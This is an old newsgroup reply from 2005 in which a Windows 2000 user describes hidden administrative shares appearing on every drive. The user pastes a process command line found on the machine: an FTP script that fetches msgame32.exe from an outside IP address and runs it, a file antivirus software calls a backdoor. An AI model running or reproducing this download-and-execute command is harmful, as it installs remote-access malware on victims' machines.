Re: Win2k Backdoor!

From: Cactus (zhanglihome)
Date: 08/10/05


Date: Wed, 10 Aug 2005 13:58:27 +0800


> I don't know what is happen.
>
> even time I start win2k.
> all harddisk was shared!
>
> and its shared name end by "$".
> so the shared Icon without display.
>

I checking process find this.

cmd /k echo open 219.131.5.180 32845 > o&echo user 1 1 >> o &echo get
msgame32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &msgame32.exe

anti-virus software say the [msgame32.exe] is a backdoor program.

the attack again and again. I no idea who start the process?